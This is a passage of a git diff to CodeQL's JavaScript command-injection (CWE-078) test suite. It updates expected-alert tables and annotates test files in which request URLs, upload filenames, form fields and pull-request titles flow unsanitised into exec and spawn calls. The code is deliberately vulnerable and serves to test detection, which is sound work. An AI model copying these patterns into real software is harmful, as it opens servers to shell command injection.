child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:39:26:39:28 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:44:5:44:34 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:43:15:43:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:54:5:54:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:54:56:56 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:6:15:6:49 | url.par ... ry.path | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:48:15:48:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:66:19:66:22 | args | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:75:29:75:31 | cmd | child_process-test.js:73:25:73:31 | req.url | child_process-test.js:75:29:75:31 | cmd | This command line depends on a $@. | child_process-test.js:73:25:73:31 | req.url | user-provided value | +| child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | This command line depends on a $@. | child_process-test.js:83:19:83:36 | req.query.fileName | user-provided value | +| child_process-test.js:94:11:94:35 | "ping " ... ms.host | child_process-test.js:94:21:94:30 | ctx.params | child_process-test.js:94:11:94:35 | "ping " ... ms.host | This command line depends on a $@. | child_process-test.js:94:21:94:30 | ctx.params | user-provided value | +| exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | exec-sh2.js:14:25:14:31 | req.url | exec-sh2.js:10:40:10:46 | command | This command line depends on a $@. | exec-sh2.js:14:25:14:31 | req.url | user-provided value | +| exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | exec-sh.js:19:25:19:31 | req.url | exec-sh.js:15:44:15:50 | command | This command line depends on a $@. | exec-sh.js:19:25:19:31 | req.url | user-provided value | +| execSeries.js:14:41:14:47 | command | execSeries.js:18:34:18:40 | req.url | execSeries.js:14:41:14:47 | command | This command line depends on a $@. | execSeries.js:18:34:18:40 | req.url | user-provided value | +| form-parsers.js:9:8:9:39 | "touch ... nalname | form-parsers.js:9:19:9:26 | req.file | form-parsers.js:9:8:9:39 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:9:19:9:26 | req.file | user-provided value | +| form-parsers.js:14:10:14:37 | "touch ... nalname | form-parsers.js:13:3:13:11 | req.files | form-parsers.js:14:10:14:37 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:13:3:13:11 | req.files | user-provided value | +| form-parsers.js:25:10:25:28 | "touch " + filename | form-parsers.js:24:48:24:55 | filename | form-parsers.js:25:10:25:28 | "touch " + filename | This command line depends on a $@. | form-parsers.js:24:48:24:55 | filename | user-provided value | +| form-parsers.js:36:10:36:31 | "touch ... ds.name | form-parsers.js:35:25:35:30 | fields | form-parsers.js:36:10:36:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:35:25:35:30 | fields | user-provided value | +| form-parsers.js:41:10:41:31 | "touch ... ds.name | form-parsers.js:40:26:40:31 | fields | form-parsers.js:41:10:41:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:40:26:40:31 | fields | user-provided value | +| form-parsers.js:53:10:53:31 | "touch ... ds.name | form-parsers.js:52:34:52:39 | fields | form-parsers.js:53:10:53:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:52:34:52:39 | fields | user-provided value | +| form-parsers.js:59:10:59:33 | "touch ... ilename | form-parsers.js:58:30:58:33 | part | form-parsers.js:59:10:59:33 | "touch ... ilename | This command line depends on a $@. | form-parsers.js:58:30:58:33 | part | user-provided value | +| other.js:7:33:7:35 | cmd | other.js:5:25:5:31 | req.url | other.js:7:33:7:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:8:28:8:30 | cmd | other.js:5:25:5:31 | req.url | other.js:8:28:8:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:9:32:9:34 | cmd | other.js:5:25:5:31 | req.url | other.js:9:32:9:34 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:10:29:10:31 | cmd | other.js:5:25:5:31 | req.url | other.js:10:29:10:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:11:29:11:31 | cmd | other.js:5:25:5:31 | req.url | other.js:11:29:11:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:12:27:12:29 | cmd | other.js:5:25:5:31 | req.url | other.js:12:27:12:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:14:28:14:30 | cmd | other.js:5:25:5:31 | req.url | other.js:14:28:14:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:15:34:15:36 | cmd | other.js:5:25:5:31 | req.url | other.js:15:34:15:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:16:21:16:23 | cmd | other.js:5:25:5:31 | req.url | other.js:16:21:16:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:17:27:17:29 | cmd | other.js:5:25:5:31 | req.url | other.js:17:27:17:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:18:22:18:24 | cmd | other.js:5:25:5:31 | req.url | other.js:18:22:18:24 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:19:36:19:38 | cmd | other.js:5:25:5:31 | req.url | other.js:19:36:19:38 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:22:21:22:23 | cmd | other.js:5:25:5:31 | req.url | other.js:22:21:22:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:23:28:23:30 | cmd | other.js:5:25:5:31 | req.url | other.js:23:28:23:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:26:34:26:36 | cmd | other.js:5:25:5:31 | req.url | other.js:26:34:26:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:28:27:28:29 | cmd | other.js:5:25:5:31 | req.url | other.js:28:27:28:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:30:33:30:35 | cmd | other.js:5:25:5:31 | req.url | other.js:30:33:30:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| other.js:34:44:34:46 | cmd | other.js:5:25:5:31 | req.url | other.js:34:44:34:46 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | +| third-party-command-injection.js:6:21:6:27 | command | third-party-command-injection.js:5:20:5:26 | command | third-party-command-injection.js:6:21:6:27 | command | This command line depends on a $@. | third-party-command-injection.js:5:20:5:26 | command | user-provided value | edges | actions.js:8:9:8:57 | title | actions.js:9:16:9:20 | title | provenance | | | actions.js:8:17:8:57 | github. ... t.title | actions.js:8:9:8:57 | title | provenance | | @@ -209,56 +261,3 @@ nodes | third-party-command-injection.js:5:20:5:26 | command | semmle.label | command | | third-party-command-injection.js:6:21:6:27 | command | semmle.label | command | subpaths -#select -| actions.js:9:8:9:22 | `echo ${title}` | actions.js:8:17:8:57 | github. ... t.title | actions.js:9:8:9:22 | `echo ${title}` | This command line depends on a $@. | actions.js:8:17:8:57 | github. ... t.title | user-provided value | -| actions.js:19:14:19:31 | `echo ${head_ref}` | actions.js:18:20:18:63 | github. ... ead.ref | actions.js:19:14:19:31 | `echo ${head_ref}` | This command line depends on a $@. | actions.js:18:20:18:63 | github. ... ead.ref | user-provided value | -| child_process-test.js:17:13:17:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:17:13:17:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:18:17:18:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:18:17:18:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:19:17:19:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:19:17:19:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:20:21:20:23 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:20:21:20:23 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:21:14:21:16 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:21:14:21:16 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:22:18:22:20 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:22:18:22:20 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:23:13:23:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:23:13:23:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:39:26:39:28 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:44:5:44:34 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:43:15:43:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:54:5:54:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:54:56:56 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:6:15:6:49 | url.par ... ry.path | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:62:5:62:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:48:15:48:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:66:19:66:22 | args | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | -| child_process-test.js:75:29:75:31 | cmd | child_process-test.js:73:25:73:31 | req.url | child_process-test.js:75:29:75:31 | cmd | This command line depends on a $@. | child_process-test.js:73:25:73:31 | req.url | user-provided value | -| child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | This command line depends on a $@. | child_process-test.js:83:19:83:36 | req.query.fileName | user-provided value | -| child_process-test.js:94:11:94:35 | "ping " ... ms.host | child_process-test.js:94:21:94:30 | ctx.params | child_process-test.js:94:11:94:35 | "ping " ... ms.host | This command line depends on a $@. | child_process-test.js:94:21:94:30 | ctx.params | user-provided value | -| exec-sh2.js:10:12:10:57 | cp.spaw ... ptions) | exec-sh2.js:14:25:14:31 | req.url | exec-sh2.js:10:40:10:46 | command | This command line depends on a $@. | exec-sh2.js:14:25:14:31 | req.url | user-provided value | -| exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | exec-sh.js:19:25:19:31 | req.url | exec-sh.js:15:44:15:50 | command | This command line depends on a $@. | exec-sh.js:19:25:19:31 | req.url | user-provided value | -| execSeries.js:14:41:14:47 | command | execSeries.js:18:34:18:40 | req.url | execSeries.js:14:41:14:47 | command | This command line depends on a $@. | execSeries.js:18:34:18:40 | req.url | user-provided value | -| form-parsers.js:9:8:9:39 | "touch ... nalname | form-parsers.js:9:19:9:26 | req.file | form-parsers.js:9:8:9:39 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:9:19:9:26 | req.file | user-provided value | -| form-parsers.js:14:10:14:37 | "touch ... nalname | form-parsers.js:13:3:13:11 | req.files | form-parsers.js:14:10:14:37 | "touch ... nalname | This command line depends on a $@. | form-parsers.js:13:3:13:11 | req.files | user-provided value | -| form-parsers.js:25:10:25:28 | "touch " + filename | form-parsers.js:24:48:24:55 | filename | form-parsers.js:25:10:25:28 | "touch " + filename | This command line depends on a $@. | form-parsers.js:24:48:24:55 | filename | user-provided value | -| form-parsers.js:36:10:36:31 | "touch ... ds.name | form-parsers.js:35:25:35:30 | fields | form-parsers.js:36:10:36:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:35:25:35:30 | fields | user-provided value | -| form-parsers.js:41:10:41:31 | "touch ... ds.name | form-parsers.js:40:26:40:31 | fields | form-parsers.js:41:10:41:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:40:26:40:31 | fields | user-provided value | -| form-parsers.js:53:10:53:31 | "touch ... ds.name | form-parsers.js:52:34:52:39 | fields | form-parsers.js:53:10:53:31 | "touch ... ds.name | This command line depends on a $@. | form-parsers.js:52:34:52:39 | fields | user-provided value | -| form-parsers.js:59:10:59:33 | "touch ... ilename | form-parsers.js:58:30:58:33 | part | form-parsers.js:59:10:59:33 | "touch ... ilename | This command line depends on a $@. | form-parsers.js:58:30:58:33 | part | user-provided value | -| other.js:7:33:7:35 | cmd | other.js:5:25:5:31 | req.url | other.js:7:33:7:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:8:28:8:30 | cmd | other.js:5:25:5:31 | req.url | other.js:8:28:8:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:9:32:9:34 | cmd | other.js:5:25:5:31 | req.url | other.js:9:32:9:34 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:10:29:10:31 | cmd | other.js:5:25:5:31 | req.url | other.js:10:29:10:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:11:29:11:31 | cmd | other.js:5:25:5:31 | req.url | other.js:11:29:11:31 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:12:27:12:29 | cmd | other.js:5:25:5:31 | req.url | other.js:12:27:12:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:14:28:14:30 | cmd | other.js:5:25:5:31 | req.url | other.js:14:28:14:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:15:34:15:36 | cmd | other.js:5:25:5:31 | req.url | other.js:15:34:15:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:16:21:16:23 | cmd | other.js:5:25:5:31 | req.url | other.js:16:21:16:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:17:27:17:29 | cmd | other.js:5:25:5:31 | req.url | other.js:17:27:17:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:18:22:18:24 | cmd | other.js:5:25:5:31 | req.url | other.js:18:22:18:24 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:19:36:19:38 | cmd | other.js:5:25:5:31 | req.url | other.js:19:36:19:38 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:22:21:22:23 | cmd | other.js:5:25:5:31 | req.url | other.js:22:21:22:23 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:23:28:23:30 | cmd | other.js:5:25:5:31 | req.url | other.js:23:28:23:30 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:26:34:26:36 | cmd | other.js:5:25:5:31 | req.url | other.js:26:34:26:36 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:28:27:28:29 | cmd | other.js:5:25:5:31 | req.url | other.js:28:27:28:29 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:30:33:30:35 | cmd | other.js:5:25:5:31 | req.url | other.js:30:33:30:35 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| other.js:34:44:34:46 | cmd | other.js:5:25:5:31 | req.url | other.js:34:44:34:46 | cmd | This command line depends on a $@. | other.js:5:25:5:31 | req.url | user-provided value | -| third-party-command-injection.js:6:21:6:27 | command | third-party-command-injection.js:5:20:5:26 | command | third-party-command-injection.js:6:21:6:27 | command | This command line depends on a $@. | third-party-command-injection.js:5:20:5:26 | command | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref index f4c8654cda8a..8d677af35712 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/CommandInjection.ql \ No newline at end of file +query: Security/CWE-078/CommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 1cfea0118bc2..ebc765667a85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -5,8 +5,8 @@ const { exec } = require('child_process'); // function to echo title function echo_title() { // get the title from the event pull request - const title = github.context.payload.pull_request.title; - exec(`echo ${title}`, (err, stdout, stderr) => { // NOT OK + const title = github.context.payload.pull_request.title; // $ Source + exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; } @@ -15,8 +15,8 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { - const head_ref = github.context.payload.pull_request.head.ref; - aexec.exec(`echo ${head_ref}`).then((res) => { // NOT OK + const head_ref = github.context.payload.pull_request.head.ref; // $ Source + aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index abc9704a48e8..d11d97fc1c35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -3,76 +3,76 @@ var cp = require("child_process"), url = require('url'); var server = http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Sink Source - cp.exec("foo"); // OK - cp.execSync("foo"); // OK - cp.execFile("foo"); // OK - cp.execFileSync("foo"); // OK - cp.spawn("foo"); // OK - cp.spawnSync("foo"); // OK - cp.fork("foo"); // OK + cp.exec("foo"); + cp.execSync("foo"); + cp.execFile("foo"); + cp.execFileSync("foo"); + cp.spawn("foo"); + cp.spawnSync("foo"); + cp.fork("foo"); - cp.exec(cmd); // NOT OK - cp.execSync(cmd); // NOT OK - cp.execFile(cmd); // NOT OK - cp.execFileSync(cmd); // NOT OK - cp.spawn(cmd); // NOT OK - cp.spawnSync(cmd); // NOT OK - cp.fork(cmd); // NOT OK + cp.exec(cmd); // $ Alert + cp.execSync(cmd); // $ Alert + cp.execFile(cmd); // $ Alert + cp.execFileSync(cmd); // $ Alert + cp.spawn(cmd); // $ Alert + cp.spawnSync(cmd); // $ Alert + cp.fork(cmd); // $ Alert - cp.exec("foo" + cmd + "bar"); // NOT OK + cp.exec("foo" + cmd + "bar"); // $ Alert // These are technically NOT OK, but they are more likely as false positives - cp.exec("foo", {shell: cmd}); // OK - cp.exec("foo", {env: {PATH: cmd}}); // OK - cp.exec("foo", {cwd: cmd}); // OK - cp.exec("foo", {uid: cmd}); // OK - cp.exec("foo", {gid: cmd}); // OK + cp.exec("foo", {shell: cmd}); + cp.exec("foo", {env: {PATH: cmd}}); + cp.exec("foo", {cwd: cmd}); + cp.exec("foo", {uid: cmd}); + cp.exec("foo", {gid: cmd}); let sh, flag; if (process.platform == 'win32') sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // NOT OK + cp.spawn(sh, [ flag, cmd ]); // $ Alert Sink let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK - cp.execFile("/bin/bash", args); + args[1] = cmd; // $ Sink + cp.execFile("/bin/bash", args); // $ Alert - let args = []; + args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Sink run("sh", args); - let args = []; + args = []; args[0] = `-` + "c"; - args[1] = cmd; // NOT OK - cp.execFile(`/bin` + "/bash", args); + args[1] = cmd; // $ Sink + cp.execFile(`/bin` + "/bash", args); // $ Alert - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // NOT OK - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert Sink + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert Sink - let myArgs = []; + let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY] + cp.execFile(`/bin` + "/bash", myArgs); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); -function run(cmd, args) { - cp.spawn(cmd, args); // OK - the alert happens where `args` is build. +function run(cmd, args) { // $ Sink + cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build. } var util = require("util") http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source - util.promisify(cp.exec)(cmd); // NOT OK + util.promisify(cp.exec)(cmd); // $ Alert }); @@ -80,7 +80,7 @@ const webpackDevServer = require('webpack-dev-server'); new webpackDevServer(compiler, { before: function (app) { app.use(function (req, res, next) { - cp.exec(req.query.fileName); // NOT OK + cp.exec(req.query.fileName); // $ Alert require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo }); @@ -91,5 +91,5 @@ import Router from "koa-router"; const router = new Router(); router.get("/ping/:host", async (ctx) => { - cp.exec("ping " + ctx.params.host); // NOT OK -}); \ No newline at end of file + cp.exec("ping " + ctx.params.host); // $ Alert +}); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b5b8fc602bdf..9e59ff90b140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,10 +12,10 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink } http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index ad91b66f5344..5b6d770a2653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,10 +7,10 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // BAD + return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink }; http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 25e45d675d9f..45f3e25a8971 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -11,10 +11,10 @@ function asyncEach(arr, iterator) { } function execEach(commands) { - asyncEach(commands, (command) => exec(command)); // NOT OK + asyncEach(commands, (command) => exec(command)); // $ Alert }; require('http').createServer(function(req, res) { - let cmd = require('url').parse(req.url, true).query.path; + let cmd = require('url').parse(req.url, true).query.path; // $ Source execEach([cmd]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 4b1dabde4412..22ca9745c101 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -6,12 +6,12 @@ var app = express(); var exec = require("child_process").exec; app.post('/profile', upload.single('avatar'), function (req, res, next) { - exec("touch " + req.file.originalname); // NOT OK + exec("touch " + req.file.originalname); // $ Alert }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { - req.files.forEach(file => { - exec("touch " + file.originalname); // NOT OK + req.files.forEach(file => { // $ Source + exec("touch " + file.originalname); // $ Alert }) }); @@ -21,8 +21,8 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); - busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { - exec("touch " + filename); // NOT OK + busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source + exec("touch " + filename); // $ Alert }); req.pipe(busboy); }).listen(8000); @@ -32,13 +32,13 @@ const formidable = require('formidable'); app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); - form.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + form.parse(req, (err, fields, files) => { // $ Source + exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); - form2.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + form2.parse(req, (err, fields, files) => { // $ Source + exec("touch " + fields.name); // $ Alert }); }); @@ -49,14 +49,14 @@ http.createServer(function (req, res) { // parse a file upload var form = new multiparty.Form(); - form.parse(req, function (err, fields, files) { - exec("touch " + fields.name); // NOT OK + form.parse(req, function (err, fields, files) { // $ Source + exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); - form2.on('part', function (part) { // / file / field - exec("touch " + part.filename); // NOT OK + form2.on('part', function (part) { // $ Source - / file / field + exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index 2e86ace433ce..d4d4b36b674f 100644 --- 